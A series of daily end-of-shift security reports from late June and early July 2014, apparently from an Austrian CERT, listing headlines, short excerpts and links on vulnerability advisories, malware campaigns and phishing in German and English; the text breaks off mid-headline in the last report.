3.1. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** OpenSSL vulnerabilities in IBM Products *** --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** RealPlayer MP4 Memory Corruption Flaw Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030524 *** [webapps] - Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability *** --------------------------------------------- http://www.exploit-db.com/exploits/33984 *** VU#960193: AVG Secure Search ActiveX control provides insecure methods *** --------------------------------------------- Vulnerability Note VU#960193 AVG Secure Search ActiveX control provides insecure methods Original Release date: 07 Jul 2014 | Last revised: 07 Jul 2014 Overview The AVG Secure Search toolbar includes an ActiveX control that provides a number of unsafe methods, which may allow a remote, unauthenticated attacker to execute arbitrary code with the privileges of the user. Description AVG Secure Search is a toolbar add-on for web browsers that "... provides an additional security layer while --------------------------------------------- http://www.kb.cert.org/vuls/id/960193 *** Bugtraq: CVE-2014-3863 - Stored XSS in JChatSocial *** --------------------------------------------- http://www.securityfocus.com/archive/1/532662 *** WordPress Theme My Login for WordPress file include *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94160

1 0

Tageszusammenfassung - Freitag 4-07-2014
by Daily end-of-shift report 04 Jul '14

04 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 03-07-2014 18:00 − Freitag 04-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Cisco Intelligent Automation for Cloud Form Data Viewer information disclosure *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94177 *** VU#143740: Netgear GS108PE Prosafe Plus Switch contains hard-coded login credentials *** --------------------------------------------- Netgear GS108PE Prosafe Plus Switch contains hard-coded login credentials that can be used for authenticating to the web server running on the device. The username is .. --------------------------------------------- http://www.kb.cert.org/vuls/id/143740 *** MS14-JUL - Microsoft Security Bulletin Advance Notification for July 2014 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS14-JUL *** Phishing: iPhone 6 und iWatch als Lockmittel *** --------------------------------------------- Angreifer nutzen derzeit die Aufmerksamkeit rund um zukünftige Apple-Produkte, um Nutzer auf eine gefälschte Apple-Webseite zu locken. Die Aufmachung der Mail erinnert an offizielle Apple-Mitteilungen. --------------------------------------------- http://www.heise.de/security/meldung/Phishing-iPhone-6-und-iWatch-als-Lockm… *** Security Bulletin: IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure (CVE-2014-0860) *** --------------------------------------------- The administrative IPMI credentials for authenticating communications between the IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) are stored in plaintext within the AMM firmware binaries. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm… *** Dailymotion Compromised to Send Users to Exploit Kit *** --------------------------------------------- Attackers made the popular video site redirect users to the Sweet Orange Exploit Kit. On June 28, the popular video sharing website Dailymotion was compromised to redirect users to the Sweet Orange Exploit Kit. This exploit kit takes advantage of vulnerabilities in Java, Internet Explorer, and Flash Player. If the .. --------------------------------------------- http://www.symantec.com/connect/blogs/dailymotion-compromised-send-users-ex… *** HP Universal Configuration Management Database Flaws Let Remote Users Obtain Information and Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030518 *** "Phishing wird vom seltenen Anlass zum Tagesgeschäft" *** --------------------------------------------- Während immer mehr Phishing-Webseiten auftauchen, werden die angewandten Taktiken immer raffinierter. Opfer werden vermehrt persönlich angesprochen. --------------------------------------------- http://futurezone.at/digital-life/phishing-wird-vom-seltenen-anlass-zum-tag… *** Miniduke is back: Nemesis Gemina and the Botgen Studio *** --------------------------------------------- In the wake of our publications from 2013, the Miniduke campaigns have stopped or at least decreased in intensity. However, in the beginning of 2014 they resumed attacks in full force, once again grabbing our attention. We believe its time to uncover more information on their operations. --------------------------------------------- https://www.securelist.com/en/blog/208214341/Miniduke_is_back_Nemesis_Gemin… *** phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys *** --------------------------------------------- In this post we will detail the phpinfo() type confusion vulnerability that we disclosed to PHP.net and show how it allows a PHP script to steal the private SSL key. We demonstrate this on a Ubuntu 12.04 LTS 32 bit default installation of PHP and mod_ssl. Unfortunately this kind of problem is not considered a security problem by PHP.net and therefore this security vulnerability does not have a CVE name assignet to it, yet. --------------------------------------------- https://www.sektioneins.de/en/blog/14-07-04-phpinfo-infoleak.html

1 0

Tageszusammenfassung - Donnerstag 3-07-2014
by Daily end-of-shift report 03 Jul '14

03 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 02-07-2014 18:00 − Donnerstag 03-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Multiple Vulnerabilities in Cisco Unified Communications Domain Manager *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Analysis of a New Banking Trojan Spammed by Cutwail *** --------------------------------------------- The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from .. --------------------------------------------- http://blog.spiderlabs.com/2014/07/analysis-of-a-banking-trojan-spammed-by-… *** Simple Javascript Extortion Scheme Advertised via Bing, (Wed, Jul 2nd) *** --------------------------------------------- Thanks to our reader Dan for spotting this one. As of today, a search for "Katie Matusik" on Bing will include the following result. The rank has been slowly rising during the day, and as of right now, it is the first link after the link to "Videos" Once a user clicks on the link, the user is redirected to .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18337&rss *** Multiple vulnerabilities in third-party Drupal modules *** --------------------------------------------- https://www.drupal.org/node/2296783 https://www.drupal.org/node/2296511 https://www.drupal.org/node/2296495 *** New Android Malware HijackRAT Attacks Mobile Banking Users *** --------------------------------------------- Cybercriminals have rolled out a new malicious Android application that wraps different varieties of banking fraud trick into a single piece of advanced mobile malware. --------------------------------------------- http://thehackernews.com/2014/07/new-android-malware-hijackrat-attacks.html *** Exploring the Java vulnerability (CVE-2013-2465) used in the Fiesta EK *** --------------------------------------------- While going through our daily analysis this month, we came across several Fiesta Exploit Kit attacks. Although this EK first emerged in August 2013, the authors have constantly updated their .. --------------------------------------------- http://research.zscaler.com/2014/07/exploring-java-vulnerability-cve-2013.h… *** Avast hielt Krypto-Messenger für Trojaner *** --------------------------------------------- Wer angeblich mit dem Trojaner "Android:Banker-BW" infiziert ist, kann die Warnung unter Umständen getrost ignorieren. Der Avast-Virenscanner hat Moxie Marlinspikes Krypto-Messenger TextSecure fälschlicherweise als Malware eingestuft. --------------------------------------------- http://www.heise.de/security/meldung/Avast-hielt-Krypto-Messenger-fuer-Troj… *** Bugtraq: [security bulletin] HPSBMU03059 rev.1 - HP SiteScope, Remote Authentication Bypass *** --------------------------------------------- http://www.securityfocus.com/archive/1/532631 *** DynDNS-Dienst: Microsoft hat Domains an NoIP zurückgegeben *** --------------------------------------------- Seit Tagen funktioniert der DynDNS-Dienst NoIP für viele Kunden nicht, weil Microsoft die Domains übertragen wurden und viele Anfragen ins Leere liefen. Nun hat Microsoft die Domains zurückgegeben und die Lage sollte sich normalisieren. --------------------------------------------- http://www.heise.de/security/meldung/DynDNS-Dienst-Microsoft-hat-Domains-an… *** VU#402020: Autodesk VRED contains an unauthenticated remote code execution vulnerability *** --------------------------------------------- Improper Neutralization of Special Elements used in an OS Command (OS Command Injection): Autodesk VRED Professional 2014 contains an unauthenticated remote code execution vulnerability. Autodesk VRED Professional 2014. --------------------------------------------- http://www.kb.cert.org/vuls/id/402020 *** 8 Common Pitfalls of HeartBleed Identification and Remediation (CVE-2014-0160) *** --------------------------------------------- Unfortunately, one of the biggest vulnerabilities disclosed this year, HeartBleed, has been inefficiently addressed and for some, already forgotten about. Plenty of details about the vulnerability already exist including our FAQ and .. --------------------------------------------- http://blog.spiderlabs.com/2014/07/pitfalls-of-heartbleed-identification-an…

1 0

Tageszusammenfassung - Mittwoch 2-07-2014
by Daily end-of-shift report 02 Jul '14

02 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 01-07-2014 18:00 − Mittwoch 02-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Microsoft Expands TLS, Forward Secrecy Support *** --------------------------------------------- Microsoft announced TLS support on Outlook.com and that OneDrive cloud storage now supports Perfect Forward Secrecy. --------------------------------------------- http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965 *** Cisco Small Cell Command Execution Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** DOWNAD Tops Malware Spam Source in Q2 2014 *** --------------------------------------------- DOWNAD , also known as Conficker remains to be one of the top 3 malware that affects enterprises and small and medium businesses. This is attributed to the fact that a number of companies are still using Windows XP, susceptible to this threat. It can infect .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/downad-tops-malw… *** VMSA-2014-0006.4 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0006.html *** Microsoft Digital Crimes Unit disrupts Jenxcus and Bladabindi malware families *** --------------------------------------------- Today, following an investigation to which the Microsoft Malware Protection Center (MMPC) contributed, the Microsoft Digital Crimes Unit initiated a disruption of the Jenxcus and Bladabindi malware families. These families are believed to have been created by individuals Naser Al Mutairi, aka njQ8, and .. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes… *** MONSTER COOKIES can nom nom nom ALL THE BLOGS *** --------------------------------------------- Blog networks can be force-fed more than they can chew Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/07/02/monster_coo… *** Transparenzzentrum: Microsoft gewährt Behörden Quellcode-Einsicht *** --------------------------------------------- In einem Transparenzzentrum will Microsoft Behörden, die Code-Manipulationen durch fremde Geheimdienste befürchten, die Gelegenheit bieten, den Source-Code selbst zu untersuchen. --------------------------------------------- http://www.heise.de/security/meldung/Transparenzzentrum-Microsoft-gewaehrt-… *** Anatomy of a buffer overflow - Googles "KeyStore" security module for Android *** --------------------------------------------- Heres a cautionary tale about a bug, courtesy of IBM. Not that IBM had the bug, just to be clear: Google had the bug, and IBM researchers spotted it. --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/02/anatomy-of-a-buffer-overflow-goo… *** OpenSSL legt Sanierungsplan vor *** --------------------------------------------- Nach der Heartbleed-Katastrophe hat das OpenSSL-Projekt nun eine Roadmap veröffentlicht, die helfen soll, organisatorische Mängel im Entwicklungsprozess auszubessern. --------------------------------------------- http://www.heise.de/security/meldung/OpenSSL-legt-Sanierungsplan-vor-224810… *** Rig Exploit Kit Used in Recent Website Compromise *** --------------------------------------------- Attackers planted code in a popular Web portal to redirect users to an exploit kit .. --------------------------------------------- http://www.symantec.com/connect/blogs/rig-exploit-kit-used-recent-website-c…

1 0

Tageszusammenfassung - Dienstag 1-07-2014
by Daily end-of-shift report 01 Jul '14

01 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 30-06-2014 18:00 − Dienstag 01-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Microsoft Darkens 4MM Sites in Malware Fight *** --------------------------------------------- Millions of Web sites were shuttered Monday morning after Microsoft executed a legal sneak attack against a malware network thought to be responsible for more than 7.4 million infections of Windows PCs worldwide. --------------------------------------------- http://krebsonsecurity.com/2014/07/microsoft-darkens-4mm-sites-in-malware-f… *** Apple Releases Security Updates for OS X, Safari, iOS devices, and Apple TV *** --------------------------------------------- Apple has released security updates for Mac OS X, Safari, iOS devices, and Apple TV to address multiple vulnerabilities, some of which could allow attackers to execute arbitrary code with system privileges or cause an unexpected application termination. --------------------------------------------- https://www.us-cert.gov/ncas/current-activity/2014/07/01/Apple-Releases-Sec… *** [2014-06-30] Multiple vulnerabilities in IBM Algorithmics RICOS *** --------------------------------------------- Abusing multiple vulnerabilities within IBM Algorithmics RICOS, an attacker can take over foreign user accounts and bypass authorization mechanisms. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** JBoss Seam org.jboss.seam.web.AuthenticationFilter code execution *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/94090 *** ICS Focused Malware *** --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-178-01 *** CERT-Bund: Trojaner-Opfer ändern Passwörter, PCs bleiben infiziert *** --------------------------------------------- Die Auswertung von zehntausenden kompromittierten Mail-Zugangsdaten zeigt, dass ein beträchtlicher Teil der Opfer zwar sein Passwort ändert, allerdings schnell erneut zum Opfer wird - möglicherweise, weil der Rechner nicht desinfiziert wurde. --------------------------------------------- http://www.heise.de/security/meldung/CERT-Bund-Trojaner-Opfer-aendern-Passw… *** [2014-07-01] Stored cross site scripting in EMC Documentum eRoom *** --------------------------------------------- Due to improper input validation, EMC Documentum eRoom suffers from multiple stored cross-site scripting vulnerabilities, which allow an attacker to steal other users sessions, to impersonate other users and to gain unauthorized access to documents hosted in eRooms. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Apple testet Zwei-Faktor-Authentifizierung auf iCloud.com *** --------------------------------------------- Künftig sollen auch auf Apples Cloud-Portal Zugangsdaten besser abgesichert werden. Gestern war die Funktion kurzzeitig freigegeben. --------------------------------------------- http://www.heise.de/security/meldung/Apple-testet-Zwei-Faktor-Authentifizie… *** Verwirrung um Microsofts Sicherheits-Newsletter *** --------------------------------------------- Wer Windows-Rechner administriert, weiss den Security-Notifications-Newsletter von Microsoft zu schätzen. Letzte Woche kündigte das Unternehmen an, diesen einzustellen - um die Entscheidung kurz darauf zu revidieren. --------------------------------------------- http://www.heise.de/security/meldung/Verwirrung-um-Microsofts-Sicherheits-N… *** Cyberspying Campaign Comes With Sabotage Option *** --------------------------------------------- New research from Symantec spots US and Western European energy interests in the bulls eye, but the campaign could encompass more than just utilities. --------------------------------------------- http://www.darkreading.com/vulnerabilities---threats/advanced-threats/cyber… *** Geodo: New Cridex Version Combines Data Stealer and Email Worm *** --------------------------------------------- Recent efforts by our Research Lab has revealed new activity related to Cridex. As you may recall, Cridex is a data stealer also referred to as Feodo, and Bugat. The new Cridex version we are seeing now, aka Geodo, combines a self-spreading infection method - effectively turning each bot in the botnet .. --------------------------------------------- http://www.seculert.com/blog/2014/07/geodo-new-cridex-version-combines-data… *** Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters) *** --------------------------------------------- Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required). This is a serious vulnerability, The MailPoet plugin (wysija-newsletters) .. --------------------------------------------- http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet… *** IBM BladeCenter Advanced Management Module (AMM), Integrated Management Module (IMM), and Integrated Management Module 2 (IMM2) Potential IPMI credentials Exposure *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/90880

1 0

Tageszusammenfassung - Montag 30-06-2014
by Daily end-of-shift report 30 Jun '14

30 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 27-06-2014 18:00 − Montag 30-06-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** The Akamai State of the Internet Report *** --------------------------------------------- The globally distributed Akamai Intelligent Platform delivers over 2 trillion Internet interactions and defends against multiple DDoS attacks each day. This provides us with unique visibility into Internet connection speeds, broadband adoption, mobile usage, outages, and attacks. Drawing .. --------------------------------------------- http://www.akamai.com/stateoftheinternet/ *** OpenAFS Memory Error Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030459 *** 20 Jahre alte Kompressionsverfahren-Lücke sorgt für Verwirrung *** --------------------------------------------- Sicherheitsforscher deckte Schwachstelle auf, von der hauptsächlich Linux-User betroffen sein sollen - Entwarnung von Autoren --------------------------------------------- http://derstandard.at/2000002429137 *** Serious Android crypto key theft vulnerability affects 86% of devices *** --------------------------------------------- Bug in Android KeyStore that leaks credentials fixed only in KitKat. --------------------------------------------- http://arstechnica.com/security/2014/06/serious-android-crypto-key-theft-vu… *** Anatomy of an Android SMS virus - watch out for text messages, even from your friends! *** --------------------------------------------- Paul Ducklin looks into "Andr/SlfMite-A", an Android SMS virus. The malware sends itself to your top 20 contacts and foists an third party app for an alternative Android software market onto your device... --------------------------------------------- http://nakedsecurity.sophos.com/2014/06/29/anatomy-of-an-android-sms-virus-… *** DSA-2970 cacti *** --------------------------------------------- http://www.debian.org/security/2014/dsa-2970 *** Microsoft Kills Security Emails, Blames Canada *** --------------------------------------------- In a move that may wind up helping spammers, Microsoft is blaming a new Canadian anti-spam law for the companys recent decision to stop sending regular emails about security updates for its Windows operating system and other Microsoft software. --------------------------------------------- http://krebsonsecurity.com/2014/06/microsoft-kills-security-emails-blames-c… *** ICS Focused Malware (Update A) *** --------------------------------------------- This alert update is a follow-up to the original NCCIC/ICS-CERT Alert titled ICS-ALERT-14-176-02 ICS Focused Malware that was published June 25, 2014 on the ICS-CERT web site, and includes information previously published to the US-CERT secure portal. --------------------------------------------- http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-176-02A *** Disqus Wordpress Plugin Flaw Leaves Millions of Blogs Vulnerable to Hackers *** --------------------------------------------- A Remote code execution (RCE) vulnerability has been discovered in the comment and discussion service, Disqus plugin for the most popular Blogging Platform Wordpress. While there are more than 70 million websites on the Internet currently running WordPress, about 1.3 million of them use the 'Disqus Comment System' Plugin, making it one of the popular plugins of Wordpress for web comments --------------------------------------------- http://thehackernews.com/2014/06/disqus-wordpress-plugin-flaw-leaves.html *** Medienplayer VLC mit kritischer Krypto-Lücke *** --------------------------------------------- Eine Schwachstelle in GnuTLS kann offenbar auch VLC-Nutzern zum Verhängnis werden: Versucht der Mediaplayer einen Stream von einem präparierten Server zu öffnen, droht die Infektion mit Schadcode. --------------------------------------------- http://www.heise.de/security/meldung/Medienplayer-VLC-mit-kritischer-Krypto… *** Analysis: Spam in May 2014 *** --------------------------------------------- In the run-up to the summer, spammers offered their potential customers seedlings and seeds for gardening. In addition, English-language festive spam in May was dedicated to Mother's Day - the attackers sent out adverts offering flowers and candies. --------------------------------------------- http://www.securelist.com/en/analysis/204792339/Spam_in_May_2014 *** How to protect yourself against privileged user abuse *** --------------------------------------------- Network World - The typical organization loses 5% of its revenues to fraud by its own employees each year, with most thefts committed by trusted employees in executive management, operations, accounting, sales, customer service or purchasing, .. --------------------------------------------- http://www.computerworld.com/s/article/9249440/How_to_protect_yourself_agai… *** Auch Google schliesst Datenleck im Cloud-Speicher *** --------------------------------------------- Wer Links in bei Google Drive abgelegten Dokumenten anklickt, hinterlässt Datenspuren. Durch diese können Dritte auf die Dokumente zugreifen. --------------------------------------------- http://www.heise.de/security/meldung/Auch-Google-schliesst-Datenleck-im-Clo…

1 0

Tageszusammenfassung - Freitag 27-06-2014
by Daily end-of-shift report 27 Jun '14

27 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 26-06-2014 18:00 − Freitag 27-06-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Stuxnet-like Havex Malware Strikes European SCADA Systems *** --------------------------------------------- Security researchers have uncovered a new Stuxnet like malware, named as "Havex", which was used in a number of previous cyber attacks against organizations in the energy sector. Just like Famous Stuxnet Worm, which was specially designed to sabotage the Iranian nuclear project, the new trojan Havex is also programmed to infect industrial control system softwares of SCADA and ICS systems,... --------------------------------------------- http://thehackernews.com/2014/06/stuxnet-like-havex-malware-strikes.html *** Integer-Overflow: Sicherheitslücke in Kompressionsverfahren LZ4 und LZO *** --------------------------------------------- Im Code für die weit verbreiteten Kompressionsverfahren LZO und LZ4 wurde eine Sicherheitslücke entdeckt. Das betrifft zahlreiche Anwendungen, darunter den Linux-Kernel, die Multimediabibliotheken FFmpeg und Libav, sowie OpenVPN. --------------------------------------------- http://www.golem.de/news/integer-overflow-sicherheitsluecke-in-kompressions… *** Image Stock Spam Reemerges *** --------------------------------------------- Image stock spam, which can affect share prices and cause financial loss, has become more prominent in the last week. Image spam has been around for a longtime and peaked in January 2007 when Symantec estimated that image spam accounted for nearly 52 percent of all spam. Pump-and-dump image stock spam made up a significant portion of that 52 percent. --------------------------------------------- http://www.symantec.com/connect/blogs/image-stock-spam-reemerges *** 1st International Conference on Information Systems Security and Privacy - ICISSP 2015 *** --------------------------------------------- Venue: ESEO, Angers, Loire Valley, France Event date: 9 - 11 February, 2015 Scope: The International Conference on Information Systems Security and Privacy aims at creating a meeting point of researchers and practitioners that address security and privacy challenges that concern information systems, especially in organizations, including not only technological issues but also social issues. --------------------------------------------- http://www.securityfocus.com/archive/1/532572 *** Neue PHP-Versionen verarzten Sicherheitslücken *** --------------------------------------------- PHP 5.4.30 und 5.5.14 schließen jeweils eine größere Anzahl von Sicherheitslücken; die Entwickler empfehlen ein zügiges Upgrade. --------------------------------------------- http://www.heise.de/security/meldung/Neue-PHP-Versionen-verarzten-Sicherhei… *** Thomson TWG87OUIR Cross Site Request Forgery *** --------------------------------------------- Topic: Thomson TWG87OUIR Cross Site Request Forgery Risk: Medium Text:#Author: nopesled #Date: 24/06/14 #Vulnerability: POST Password Reset CSRF #Tested on: Thomson TWG87OUIR (Hardware Version) ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060148 *** Bugtraq: [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution *** --------------------------------------------- http://www.securityfocus.com/archive/1/532571 *** Security Notice-Statement About the Impact of the Dual_EC_DRBG Vulnerability on Huawei Devices *** --------------------------------------------- Jun 27, 2014 17:39 --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices… *** Vuln: LZ4 lz4.c Memory Corruption Vulnerability *** --------------------------------------------- LZ4 lz4.c Memory Corruption Vulnerability --------------------------------------------- http://www.securityfocus.com/bid/68218

1 0

Tageszusammenfassung - Donnerstag 26-06-2014
by Daily end-of-shift report 26 Jun '14

26 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 25-06-2014 18:00 − Donnerstag 26-06-2014 18:00 Handler: Stephan Richter Co-Handler: Robert Waldner *** Symantec Data Insight Management Console HTML Injection and Cross-Site Scripting *** --------------------------------------------- The management console for Symantec Data Insight does not sufficiently validate/sanitize arbitrary input in two separate fields within the management GUI. This could potentially allow unauthorized command execution or potential malicious redirection. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** VMware Patches Apache Struts Flaws in vCOPS *** --------------------------------------------- VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines. --------------------------------------------- http://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858 *** phpMyAdmin 4.2.3 XSS *** --------------------------------------------- Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated users to inject arbitrary web script or HTML via a crafted table name that is improperly handled after a hide or unhide action. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014060139 *** Sophos Anti-Virus Input Validation Flaw in Configuration Console Permits Cross-Site Scripting Attacks *** --------------------------------------------- A vulnerability was reported in the Sophos Anti-Virus Configuration Console. A remote user can conduct cross-site scripting attacks. Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Sophos Anti-Virus configuration console software and will run in the security context of that site. --------------------------------------------- http://www.securitytracker.com/id/1030467 *** IBM Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 7.0.0.33 *** --------------------------------------------- Cross reference list for security vulnerabilites fixed in IBM WebSphere Application Server 7.0.0.33 and IBM WebSphere Application Server Hypervisor Edition 7.0.0.33 CVE(s): CVE-2013-6323, CVE-2013-6329, CVE-2013-6349, CVE-2013-6738, CVE-2014-0859, CVE-2013-6438, CVE-2013-6747, CVE-2014-3022, CVE-2014-0891, CVE-2014-0965, CVE-2014-0050, CVE-2014-0098, CVE-2014-0963 and CVE-2014-0114 Affected product(s) and affected version(s): WebSphere Application Server and bundling --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 8.0.0.9 *** --------------------------------------------- Cross reference list for security vulnerabilites fixed in IBM WebSphere Application Server 8.0.0.9 and IBM WebSphere Application Server Hypervisor 8.0.0.9 CVE(s): CVE-2013-6323, CVE-2013-6329, CVE-2013-6349, CVE-2014-0823, CVE-2013-6738, CVE-2014-0857, CVE-2014-0859, CVE-2013-6438, CVE-2013-6747, CVE-2014-3022, CVE-2014-0891, CVE-2014-0965, CVE-2014-0050, CVE-2014-0098, CVE-2014-0963 and CVE-2014-0076 Affected product(s) and affected version(s): WebSphere Application Server and bundling --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: Rational ClearQuest is affected by the following OpenSSL vulnerabilities: CVE-2014-0224, CVE-2014-3470 *** --------------------------------------------- Security vulnerabilities have been discovered in OpenSSL that were reported on June 5, 2014 by the OpenSSL Project. The OpenSSL commponent is shipped as embedded in cqperl. Customers might be affected when there is perl hooks or scripts that are using SSL connections. ClearQuest itself does not provide any service using OpenSSL. CVE(s): CVE-2014-0224 and CVE-2014-3470 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** PayPal 2FA mobe flaw chills warm and fuzzy security feeling *** --------------------------------------------- PayPal's second factor authentication (2FA) protection can be mitigated through mobile device interfaces that allow fraudsters to steal funds with a victim's username and password, Duo Security researchers say. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/06/26/paypal_2fa_… *** Multiple Cross Site Scripting in Sophos Antivirus Configuration Console (Linux) *** --------------------------------------------- The Configuration Console of Sophos Antivirus 9.5.1 (Linux) does not sanitize several input parameters before sending them back to the browser, so an attacker could inject code inside these parameters, including JavaScript code. ... CVE: CVE-2014-2385 Affected version: 9.5.1 Fixed version: 9.6.1 --------------------------------------------- https://www.portcullis-security.com/security-research-and-downloads/securit… *** Weniger NTP-Server für dDoS ausnutzbar, aber... *** --------------------------------------------- Die noch verwundbaren Zeitserver sind aber zum Teil so schlecht konfiguriert, dass verheerende NTP-Verstärkungsangriffe nach wie vor möglich sind. --------------------------------------------- http://www.heise.de/newsticker/meldung/Weniger-NTP-Server-fuer-dDoS-ausnutz… *** Fighting cybercrime: Strategic cooperation agreement signed between ENISA and Europol *** --------------------------------------------- The heads of ENISA and Europol today signed a strategic cooperation agreement in Europol's headquarters in The Hague, to facilitate closer cooperation and exchange of expertise in the fight against cybercrime. --------------------------------------------- http://www.enisa.europa.eu/media/press-releases/fighting-cybercrime-strateg… *** 2014 Cyber Attacks Timeline Master Index (at least so far) *** --------------------------------------------- Finally I was able to organize the timelines collected in 2014. I have created a new page with the 2014 Cyber Attacks Timeline Master Index accessible either directly or from the link in the top menu bar. Hopefully it will be regularly updated. With this opportunity I also re-ordered the timelines and stats for 2013. Now everything should be more structured. --------------------------------------------- http://hackmageddon.com/2014/06/24/2014-cyber-attacks-timeline-master-index… *** Update to Microsoft Update client *** --------------------------------------------- This article describes the update that further improves the security of Windows Update (WU) / Microsoft Update (MU) client for Windows 8, Windows RT, Windows Server 2012, Windows 7 Service Pack 1 (SP1), and Windows Server 2008 R2 SP1. Note: Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 with update 2919355 already include these improvements. --------------------------------------------- http://support.microsoft.com/kb/2887535 *** Hacking Blind (PDF) *** --------------------------------------------- Abstract We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. --------------------------------------------- http://www.exploit-db.com/download_pdf/33872

1 0

Tageszusammenfassung - Mittwoch 25-06-2014
by Daily end-of-shift report 25 Jun '14

25 Jun '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 24-06-2014 18:00 − Mittwoch 25-06-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** TimThumb WebShot Code Execution Exploit (0-day) *** --------------------------------------------- If you are still using Timthumb after the serious vulnerability that was found on it last year, you have one more reason to be concerned. A new 0-day was just disclosed on TimThumb's "Webshot" feature that allows for certain commands to be executed on the vulnerable website remotely (no authentication required). With a simple command,... --------------------------------------------- http://blog.sucuri.net/2014/06/timthumb-webshot-code-execution-exploit-0-da… *** SPAM Hack Targets WordPress Core Install Directories *** --------------------------------------------- Do you run your website on WordPress? Have you checked the integrity of your core install lately for SPAM like "Google Pharmacy" stores or other fake stores? We have been tracking and analyzing a growing trend in SEO Spam (a.k.a., Search Engine Poisoning (SEP)) attacks in which thousands of compromised WordPress websites are being used... --------------------------------------------- http://blog.sucuri.net/2014/06/spam-hack-targets-wordpress-core-install-dir… *** Asprox botnet campaign shifts tactics, evades detection *** --------------------------------------------- FireEye researchers are tracking spikes in malicious emails attributed to an ongoing Asprox campaign. --------------------------------------------- http://www.scmagazine.com/asprox-botnet-campaign-shifts-tactics-evades-dete… *** R2DR2: ANALYSIS AND EXPLOITATION OF UDP AMPLIFICATION 